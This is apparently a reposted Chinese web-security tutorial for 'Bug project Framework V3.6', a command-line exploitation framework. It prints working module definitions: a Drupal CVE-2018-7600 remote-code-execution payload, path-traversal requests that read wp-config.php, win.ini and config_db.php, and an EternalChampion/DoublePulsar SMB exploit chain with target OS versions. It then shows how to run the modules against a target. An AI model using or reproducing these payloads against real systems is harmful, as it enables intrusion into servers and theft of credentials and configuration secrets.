溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

web安全中Bug project Framework V3.6命令行版本怎么用

發(fā)布時(shí)間:2021-12-27 14:35:29 來源:億速云 閱讀:188 作者:小新 欄目:網(wǎng)絡(luò)安全

這篇文章將為大家詳細(xì)講解有關(guān)web安全中Bug project Framework V3.6命令行版本怎么用,小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,希望大家閱讀完這篇文章后可以有所收獲。

0x01 前言


關(guān)于BPF框架的圖形化界面是我在2017年4月份開始編寫的,開發(fā)至今已有1年又1個(gè)月,但是由于圖形化界面對于漏洞利用的便攜性和簡易性比較高,攻擊性比較大,所以迫于多方面原因,圖形化界面不會公開,在上周著手編寫了這個(gè)3.6版本的命令行版本。

關(guān)于網(wǎng)絡(luò)上流傳的被泄露的3.0圖形化版本,我說明一下,這個(gè)版本存在很多的bug,不只是模塊語法的bug,而且被泄漏的版本被捆綁了很多木馬,希望不要貿(mào)然下載,以免遭受不必要的損失!

0x02 項(xiàng)目簡介


軟件名稱:Bug project Framework
版本: 3.6

0x03 幫助


在BPF根命令行下:

      help                查詢幫助

      reload              重新加載框架,此時(shí)會刷新全部模塊

      search              搜索模塊關(guān)鍵詞并顯示
                          ( e.g.  search ms17-010 )
      searchall           顯示所有模塊

      use                 使用模塊
                          ( e.g.  use \buffer\ms17-010 Scan.bpf )
      set shellcodes      配置默認(rèn)Shellcode路徑

      exit                退出BPF


在BPF模塊命令行下:

      help                查詢幫助

      show options        查看當(dāng)前模塊參數(shù)以及配置情況

      set options         設(shè)置當(dāng)前模塊參數(shù)以及配置

      set shellcodes      配置默認(rèn)Shellcode路徑

      run                 運(yùn)行模塊

      exit                退出當(dāng)前模塊

當(dāng)你輸入除上述指定規(guī)定參數(shù)以外的命令時(shí),BPF框架會將命令識別為系統(tǒng)命令,提交Windows操作系統(tǒng)進(jìn)行處理

      HAPPY HACK !GOOD LUCK !
      2018.5.7 BY Fplyth0ner

0x04 上手操作


首先我們打開命令行,切換到BPF框架所在文件夾,框架文件結(jié)構(gòu)如下圖:

web安全中Bug project Framework V3.6命令行版本怎么用

然后鍵入BPF框架主文件全名,并執(zhí)行:

web安全中Bug project Framework V3.6命令行版本怎么用

可以看到框架當(dāng)前可調(diào)用 59 個(gè)Web Exploit模塊,12 個(gè)Web Poc模塊和33個(gè) Buffer 模塊。Web Exploit模塊提供Web應(yīng)用漏洞的檢查,Web Poc模塊提供Web應(yīng)用漏洞檢測,Buffer模塊提供外部程序的調(diào)用,例如Python,Java等解釋型語言的代碼,或者是外部可執(zhí)行文件的調(diào)用,操作靈活。

由于框架僅僅是給予模塊一個(gè)執(zhí)行環(huán)境,功能主要通過模塊來實(shí)現(xiàn),所以我們簡單展示一下三種模塊的代碼。

Web Exploit(Drupal核心遠(yuǎn)程代碼執(zhí)行漏洞):

<cs1mc>命令</cs1mc>

<cs2mc>輸出文件名</cs2mc>

<zbz>2</zbz>

<bz1>

<sfjt>post</sfjt>

<dzkz>/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax</dzkz>

<cl>Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.18.4

Content-Length: 159</cl>

<demo>mail[#markup]=<cs1/> | tee <cs2/>.txt&mail[#type]=markup&form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec</demo>

</bz1>

<bz2>

<sfjt>get</sfjt>

<demo>/<cs2/>.txt</demo>

</bz2>

<bz>CVE-2018-7600

Drupal核心遠(yuǎn)程代碼執(zhí)行漏洞

影響版本:

Drupal 6.x,7.x,8.x</bz>

Web Poc(CMS Getshell 漏洞檢測):

<zbz>3</zbz>

<bz1>

<name>WordPress DB-Backup Plugin 任意文件下載</name>

<sfjt>get</sfjt>

<demo>/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php</demo>

<expjc>1</expjc>

<zjyz></zjyz>

<xxxz>define(</xxxz>

</bz1>

<bz2>

<name>U-Mail任意文件遍歷/下載</name>

<sfjt>get</sfjt>

<demo>/webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url=file://C:\windows\win.ini&type=text/htm</demo>

<expjc>1</expjc>

<zjyz></zjyz>

<xxxz>[fonts]</xxxz>

</bz2>

<bz3>

<name>MetInfo 5.2 任意文件讀取</name>

<sfjt>get</sfjt>

<demo>/include/thumb.php?x=1&y=/../../../config&dir=config_db.php</demo>

<expjc>1</expjc>

<zjyz></zjyz>

<xxxz>con_db_host</xxxz>

</bz3>

<bz>專為CMS通殺的任意文件讀取漏洞做檢測

直接輸入 http://網(wǎng)址 即可開始檢測</bz>

Buffer(Eternalchampion):

<sfjt>inject</sfjt>

<ljfs>NB,NR,MR</ljfs>

<sctype>dll</sctype>

<cs1mc>IP地址</cs1mc>

<cs2mc>端口</cs2mc>

<cs3mc>攻擊服務(wù)</cs3mc>

<cs4mc>系統(tǒng)版本</cs4mc>

<cs5mc>系統(tǒng)架構(gòu)</cs5mc>

<zbz>5</zbz>

<bz1><cmd>Doublepulsar-1.3.1.exe --NetworkTimeout 60 --TargetIp <cs1/> --TargetPort <cs2/> --Protocol SMB --Architecture <cs5/> --Function OutputInstall --OutputFile 1.bin</cmd></bz1>

<bz2><cmd>cj.exe</cmd></bz2>

<bz3><cmd>ping -n 3 127.1 >nul</cmd></bz3>

<bz4><cmd>Eternalchampion-2.0.0.exe --TargetIp <cs1/> --TargetPort <cs2/> --ShellcodeBuffer <cj/> --Protocol <cs3/> --Target <cs4/></cmd></bz4>

<bz5><cmd>Doublepulsar-1.3.1.exe --TargetIp <cs1/> --TargetPort 445 --DllPayload <sc/> --Protocol SMB --Architecture <cs5/> --Function Rundll</cmd></bz5>

<bz>             上 下 對 應(yīng)

端口:        139   445

攻擊服務(wù):    NBT   SMB

系統(tǒng)架構(gòu):    X86   X64

系統(tǒng)版本:

   XP_SP0SP1_X86

         Windows XP Sp0 and Sp1, 32-bit

   XP_SP2SP3_X86

         Windows XP Sp2 and Sp3, 32-bit

   XP_SP1_X64

         Windows XP Sp1, 64-bit

   XP_SP2_X64

         Windows XP Sp2, 64-bit

   SERVER_2003_SP0

         Windows Sever 2003 Sp0, 32-bit

   SERVER_2003_SP1

         Windows Sever 2003 Sp1, 32-bit/64-bit

   SERVER_2003_SP2

         Windows Sever 2003 Sp2, 32-bit/64-bit

   VISTA_SP0

         Windows Vista Sp0, 32-bit/64-bit

   VISTA_SP1

         Windows Vista Sp1, 32-bit/64-bit

   VISTA_SP2

         Windows Vista Sp2, 32-bit/64-bit

   SERVER_2008_SP0

         Windows Server 2008 Sp0, 32-bit/64-bit

   SERVER_2008_SP1

         Windows Server 2008 Sp1, 32-bit/64-bit

   SERVER_2008_SP2

         Windows Server 2008 Sp2, 32-bit/64-bit

   WIN7_SP0

         Windows 7 Sp0, 32-bit/64-bit

   WIN7_SP1

         Windows 7 Sp1, 32-bit/64-bit

   SERVER_2008R2_SP0

         Windows Server 2008 R2 Sp0, 32-bit/64-bit

   SERVER_2008R2_SP1

         Windows Server 2008 R2 Sp1, 32-bit/64-bit

   WIN8_SP0

         Windows 8 Sp0, 32-bit/64-bit

</bz>

回到命令行界面,我們輸入: Search 命令執(zhí)行

web安全中Bug project Framework V3.6命令行版本怎么用

搜索到21個(gè)可用模塊,我們挑選第二個(gè)模塊,使用 Use 命令進(jìn)行模塊使用

web安全中Bug project Framework V3.6命令行版本怎么用

在該模塊的提示符下,使用 show options 命令查看模塊配置

web安全中Bug project Framework V3.6命令行版本怎么用

使用 set options 修改模塊配置,操作如下:

web安全中Bug project Framework V3.6命令行版本怎么用

可以看到已經(jīng)修改成功。


web安全中Bug project Framework V3.6命令行版本怎么用

然后鍵入 run ,回車,即可測試指定目標(biāo)。

如果想退出當(dāng)前模塊,輸入:exit 即可回到BPF主提示符,關(guān)于更多其他類型的模塊使用,和上述方法大致相同。同時(shí),在BPF命令行下,本機(jī)系統(tǒng)命令也同樣可以使用

web安全中Bug project Framework V3.6命令行版本怎么用

關(guān)于“web安全中Bug project Framework V3.6命令行版本怎么用”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯(cuò),請把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI